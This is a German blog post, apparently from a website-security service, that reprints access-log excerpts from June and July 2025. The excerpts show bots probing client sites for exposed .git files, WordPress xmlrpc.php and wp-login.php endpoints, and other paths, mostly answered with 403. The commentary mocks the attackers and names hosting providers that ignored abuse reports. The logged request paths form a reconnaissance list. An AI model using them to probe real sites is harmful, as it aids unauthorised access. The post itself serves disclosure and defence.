34.162.165.185 website*1.com – – [03/Jul/2025:19:41:57 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „https://www. website*1.com/.git/HEAD“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.69.221 website*1.com – – [03/Jul/2025:20:01:28 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.69.221 website*1.com – – [03/Jul/2025:20:01:28 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.69.221 website*1.com – – [03/Jul/2025:20:01:28 +0200] „GET /.git/config HTTP/1.0“ 403 – „https://www. website*1.com/.git/config“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.69.221 website*1.com – – [03/Jul/2025:20:01:28 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „https://www. website*1.com/.git/HEAD“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.141.202 website*1.com – – [03/Jul/2025:20:20:19 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.141.202 website*1.com – – [03/Jul/2025:20:20:19 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.141.202 website*1.com – – [03/Jul/2025:20:20:29 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „https://www. website*1.com/.git/HEAD“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.51.109 website*1.com – – [03/Jul/2025:20:22:11 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.51.109 website*1.com – – [03/Jul/2025:20:22:11 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.79.88 website*1.com – – [03/Jul/2025:20:30:47 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.79.88 website*1.com – – [03/Jul/2025:20:30:47 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.94.5 website*1.com – – [03/Jul/2025:20:45:00 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.94.5 website*1.com – – [03/Jul/2025:20:45:00 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.128.241 website*1.com – – [03/Jul/2025:20:54:46 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.128.241 website*1.com – – [03/Jul/2025:20:54:46 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.162.39 website*1.com – – [03/Jul/2025:22:49:47 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.162.39 website*1.com – – [03/Jul/2025:22:49:47 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.162.39 website*1.com – – [03/Jul/2025:22:49:47 +0200] „GET /.git/config HTTP/1.0“ 403 – „https://www. website*1.com/.git/config“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.162.39 website*1.com – – [03/Jul/2025:22:49:47 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „https://www. website*1.com/.git/HEAD“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.156.234 website*1.com – – [03/Jul/2025:22:53:53 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.156.234 website*1.com – – [03/Jul/2025:22:53:53 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.156.234 website*1.com – – [03/Jul/2025:22:53:53 +0200] „GET /.git/config HTTP/1.0“ 403 – „https://www. website*1.com/.git/config“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.156.234 website*1.com – – [03/Jul/2025:22:53:53 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „https://www. website*1.com/.git/HEAD“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.79.88 website*1.com – – [04/Jul/2025:00:02:30 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.79.88 website*1.com – – [04/Jul/2025:00:02:30 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.79.88 website*1.com – – [04/Jul/2025:00:02:30 +0200] „GET /.git/config HTTP/1.0“ 403 – „https://www. website*1.com/.git/config“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.79.88 website*1.com – – [04/Jul/2025:00:02:31 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „https://www. website*1.com/.git/HEAD“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.236.120 website*1.com – – [04/Jul/2025:00:36:13 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.236.120 website*1.com – – [04/Jul/2025:00:36:13 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.249.22 website*1.com – – [04/Jul/2025:01:27:32 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.249.22 website*1.com – – [04/Jul/2025:01:27:32 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.52.235 website*1.com – – [04/Jul/2025:01:30:22 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.52.235 website*1.com – – [04/Jul/2025:01:30:22 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.152.80 website*1.com – – [04/Jul/2025:01:49:46 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.152.80 website*1.com – – [04/Jul/2025:01:49:46 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.201.127 website*1.com – – [04/Jul/2025:02:31:42 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.201.127 website*1.com – – [04/Jul/2025:02:31:43 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.171.203 website*1.com – – [04/Jul/2025:04:26:47 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.171.203 website*1.com – – [04/Jul/2025:04:26:47 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.225.105 website*1.com – – [04/Jul/2025:06:45:10 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.225.105 website*1.com – – [04/Jul/2025:06:45:11 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.213.107 website*1.com – – [04/Jul/2025:06:49:32 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.213.107 website*1.com – – [04/Jul/2025:06:49:32 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
+
34.162.33.156 website*1.com – – [04/Jul/2025:07:06:58 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“
34.162.33.156 website*1.com – – [04/Jul/2025:07:06:58 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „ct\xe2\x80\x91git\xe2\x80\x91scanner/0.4“

Schauen wir mal, ob AS396982 – Google LLC das nun in den Griff bekommt!

Protokoll-Auszüge vom 03 Juli 2025 – Täglich Grüßen die Hacker-Idioten!

Über diverse Provider ist es ja immer das gleiche Muster, immer die gleichen Files!

Bei einigen verschiedenen Providern ist als Meldeadresse für Abuse report@abuseradar.com aufgeführt!

Bedauerlicherweise gibt es von report@abuseradar.com weder eine Antwort, noch eine Statusmeldung! Naja, somit ist auch das für uns mehr als FRAGWÜRDIG!

Bei diesen folgen Versuchen eines Hacker-Idioten über den Provider AS174 – Cogent Communications haben wir daher neben der für uns fragwürdigen Emailadresse report@abuseradar.com dann als zweite Adresse direkt den MIT VERANTWORTLICHEN PROVIDER mit abuse@cogentco.com angeschrieben!

Hier noch die armseeligen Versuche eines Hacker-Idioten:

191.101.31.167 website*1.com – – [03/Jul/2025:05:39:10 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
191.101.31.167 website*1.com – – [03/Jul/2025:05:39:10 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
191.101.31.167 website*1.com – – [03/Jul/2025:05:39:10 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
191.101.31.167 website*1.com – – [03/Jul/2025:05:39:11 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
191.101.31.167 website*1.com – – [03/Jul/2025:05:39:11 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
191.101.31.167 website*1.com – – [03/Jul/2025:05:39:11 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
191.101.31.167 website*1.com – – [03/Jul/2025:05:39:11 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
191.101.31.167 website*1.com – – [03/Jul/2025:05:39:11 +0200] „GET /2021/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
191.101.31.167 website*1.com – – [03/Jul/2025:05:39:11 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
191.101.31.167 website*1.com – – [03/Jul/2025:05:39:11 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
191.101.31.167 website*1.com – – [03/Jul/2025:05:39:11 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
191.101.31.167 website*1.com – – [03/Jul/2025:05:39:12 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
191.101.31.167 website*1.com – – [03/Jul/2025:05:39:12 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“

Diese Vollidioten von Amateur-Hackern kapieren anscheinend immer noch nicht, was eine Statusmeldung 403 bedeutet. Naja… anscheinend mal wieder dumme SCRIPT-KIDDIES, die keine Ahnung vom Hacking haben. Den Knopf eines Hacker-Tools drücken kann ja auch jeder Vollidiot, dazu braucht man kein Fachwissen!

Protokoll-Auszüge von Anfang Juli 2025 – Schauen wir mal, was wir diesen Monat für Hacker-Idioten haben!

Tägliche penetrante Zugriffe! Absolute IGNORANZ bei Emails an abuse@nybula.com!

Zum Schutz des Website-Besitzers haben wir um Auszug vom Logfile die Website in website*1 umbenannt!

Es gibt ja so einige fragwürdige Provider, die der Meinung sind, sie können über fremde Websites bestimmen und einfach machen, was sie wollen!

Diese Ignoranz wird von uns dann mit VERÖFFENTLICHUNG belohnt:

Provider: AS401116 – Nybula LLC

196.251.117.231 website*1.com – – [01/Jul/2025:06:02:57 +0200] „GET /about.php?520 HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.117.231 website*1.com – – [01/Jul/2025:06:03:30 +0200] „GET /admin.php?520 HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

196.251.117.231 website*1.com – – [01/Jul/2025:08:50:38 +0200] „GET /about.php?action=p&api=p&path=p&token= HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.117.231 website*1.com – – [01/Jul/2025:08:50:38 +0200] „GET /about.php?action=p&api=p&path=p&token= HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.117.231 website*1.com – – [01/Jul/2025:08:50:52 +0200] „GET /admin.php?action=p&api=p&path=p&token= HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
196.251.117.231 website*1.com – – [01/Jul/2025:08:50:52 +0200] „GET /admin.php?action=p&api=p&path=p&token= HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

Schauen wir nun mal, ob diese IGNORANZ weiter geht!

Seit wir viele Hacking-Versuche fast täglich melden, werden einige dieser Hacker-Idioten vorsichtiger. Man macht das erst mal ein ganz vorsichtiges GET! Kommt da ein 403, hören sie meist auf.

NUR ZU DUMM für all diese armseeligen Hacker-Idioten denn auch das melden wir nun schon seit DEZEMBER 2024!

Die Hacker Vollpfosten des Monats

Weitere Auszüge der Logs von vielen Websites in Bezug auf diese Hacker-Idioten folgen diese Tage. 😉

Tipps, wie man die Website schützen kann findest du über den Link.

Hacker Protokoll Juni 2025

Das Hacker Protokoll Juni 2025

Dieses Hacker Protokoll Juni 2025 ist nicht mehr so umfangreich, da wir ja nicht jeden Zugriff dieser Hacker-Idioten posten. Trotzdem immer wieder diese unermüdlichen Login Idioten und Amateur Hacker, die es wieder und immer wieder versuchen, trotz einem 403, eine Homepage zu hacken.

Dieses Hacker Protokoll Juni 2025 soll ebenfalls so einige Hosting-Provider und Provider für Cloud´s endlich mal wachrütteln, damit sie ENDLICH die Webspaces ihrer Kunden besser vor diesen ganzen Login- und Hacker-Müll schützen!!! Viele Mails an Abuse der jeweiligen verantwortlichen Provider wurden geschrieben. Oft kam nur Blabla aber es ändert sich absolut NICHTS!

Somit hier nun das Protokoll vom Juni. Man bedenke, die jeweiligen Tabellen sind immer nur ein ganz kleiner Auszug von dem, was da wirklich über den ganzen Tag auf den bestroffenen Websites versucht wurde. Zum Schutz der betroffenen Domains wurden diese ausgeschwärzt oder mit Stern (*) versehen.

Protokoll-Auszüge vom Juni 2025 – Und täglich Grüßen gewisse Vollidioten unter den dummen Amateur-Hackern. 😉

Zum Ende des Monats Juni noch etwas vom 30.06.25 – Hier glänzen so einige Provider mit ihrer IGNORANZ und ARROGANZ!

Unten ein Auszug vom Logfile. Zum Schutz des Website-Besitzers habe wir die Domain in website*1 umbenannt.

Folgende Provider sind hier für die SICHERHEIT MIT VERANTWORTLICH. Bedauerlicherweise wurde bisher auf KEINE unserer Abuse-Mails irgendwie reagiert!!!

Diese ARROGANZ und IGNORANZ wird dann von uns mit einer Veröffentlichung belohnt:

Dumme Hacking-Versuche über FOLGENDE MIT VERANTWORTLICHE PROVIDER:

– AS12859 – BIT BV
– AS26347 – New Dream Network, LLC
– AS38365 – Beijing Baidu Netcom Science and Technology Co., Ltd. – CHINA ist eh über unser Security-Tool auf sehr vielen Websites komplett unerwünscht und gesperrt!
– AS209711 – MUV Bilisim ve Telekomunikasyon Hizmetleri Ltd. Sti.
– AS203476 – GANDI SAS
– AS46606 – Unified Layer
– AS16276 – OVH SAS
– AS9123 – JSC TIMEWEB – RUSSLAND ist eh über unser Security-Tool auf sehr vielen Websites komplett unerwünscht und gesperrt!

213.154.226.66 www. website*1.com – – [30/Jun/2025:06:05:49 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36“
2607:f298:5:114b::f11:937b www. website*1.com – – [30/Jun/2025:06:06:00 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36“
106.13.124.160 www. website*1.com – – [30/Jun/2025:06:06:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0“
185.111.246.114 www. website*1.com – – [30/Jun/2025:06:06:12 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
155.133.138.66 www. website*1.com – – [30/Jun/2025:06:06:21 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0“
208.91.198.52 www. website*1.com – – [30/Jun/2025:06:06:27 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36“
2001:41d0:c:ae1:: www. website*1.com – – [30/Jun/2025:06:06:36 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0“
2001:41d0:2:89e5:: www. website*1.com – – [30/Jun/2025:06:06:43 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36“
2a03:6f00:6:1::3 www. website*1.com – – [30/Jun/2025:06:06:45 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36“

Vielleicht sollten wir bei gewissen Provider keine Abuse-Mail mehr schicken sondern so wie oben, es DIREKT VERÖFFENTLICHEN und dann dem MIT VERANTWORTLICHEN Provider diesen Link hier schicken? Vielleicht kümmern die sich dann ENDLICH um MEHR SICHERHEIT in IHREN NETZWERKEN!

AUSZUG VOM 10.06.25 – Herrlich, die Dummheit gewisser Hacker-Amateure!

Heute morgen haben wir uns mal wieder sehr amüsiert! Da von dem für uns eh fragwürdigen Provider AS16276 – OVH SAS mittl. alle Netzwerke über unser Security-Tool auf sehr vielen Websites gesperrt sind, kommt sowieso immer ein verdientes 403! Haha…

Dieser Hacker-Idiot raffte auch nicht, was ein 403 bedeutet, also versucht man es über 4 verschiedene User-Agents. Was haben wir uns amüsiert!

ZUGRIFFE ÜBER AS16276 – OVH SAS:

91.134.35.95 website*1.com – – [10/Jun/2025:07:09:15 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edge/92.0.902.62“
91.134.35.95 website*1.com – – [10/Jun/2025:07:09:17 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36“
91.134.35.95 website*1.com – – [10/Jun/2025:07:09:20 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1“
91.134.35.95 website*1.com – – [10/Jun/2025:07:09:20 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 9; Asus ZenFone 5Z Build/PKQ1.190831.002) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36“

Frei nach dem Motto, VERFLIXT, das muss doch irgendwie gehen, ohne 403. Haha…

Da so einige MIT VERANTWORTLICHE PROVIDER anscheinend unsere Abuse-Mails nicht ernst nehmen, veröffentlichen wir hier nun schon seit März 2025 die armseeligen LOGIN-VERSUCHE und etc. so lange öffentlich, bis die hier MIT VERANTWORTLICHEN PROVIDER dies dann endlich beenden!

Sehr beliebt, mit einem Versuch über die wp-login.php und xmlrpc.php ein 403 bekommen… Haha.

Wie dämlich muss man eigentlich sein, nicht zu raffen, das bei einem Aufruf diese 2 Files unser Security-Tool das gesamte Netz des missbrauchten Hosting-Providers sofort sperrt!

Hier ein paar armseelige Versuche mit wp-login.php und xmlrpc.php:

165.22.212.13 website*1.com – – [05/Jun/2025:12:23:05 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
165.22.212.13 website*1.com – – [05/Jun/2025:12:23:05 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67“
2a06:6440:0:2ca3::1 website*1.com – – [05/Jun/2025:12:34:55 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“
2a06:6440:0:2ca3::1 website*1.com – – [05/Jun/2025:12:34:55 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67“
222.255.214.45 website*1.com – – [05/Jun/2025:12:46:45 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“
222.255.214.45 website*1.com – – [05/Jun/2025:12:46:46 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62“
15.204.43.172 website*1.com – – [05/Jun/2025:12:58:30 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203“
15.204.43.172 website*1.com – – [05/Jun/2025:12:58:30 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“
103.169.35.190 website*1.com – – [05/Jun/2025:13:10:01 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
103.169.35.190 website*1.com – – [05/Jun/2025:13:10:01 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“
2001:1bb0:e000:1e::387 website*1.com – – [05/Jun/2025:13:21:53 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
2001:1bb0:e000:1e::387 website*1.com – – [05/Jun/2025:13:21:53 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
178.22.126.103 website*1.com – – [05/Jun/2025:13:33:36 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0“
178.22.126.103 website*1.com – – [05/Jun/2025:13:33:36 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
81.88.53.143 website*1.com – – [05/Jun/2025:13:45:16 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
81.88.53.143 website*1.com – – [05/Jun/2025:13:45:16 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68“
45.148.96.51 website*1.com – – [05/Jun/2025:13:56:44 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
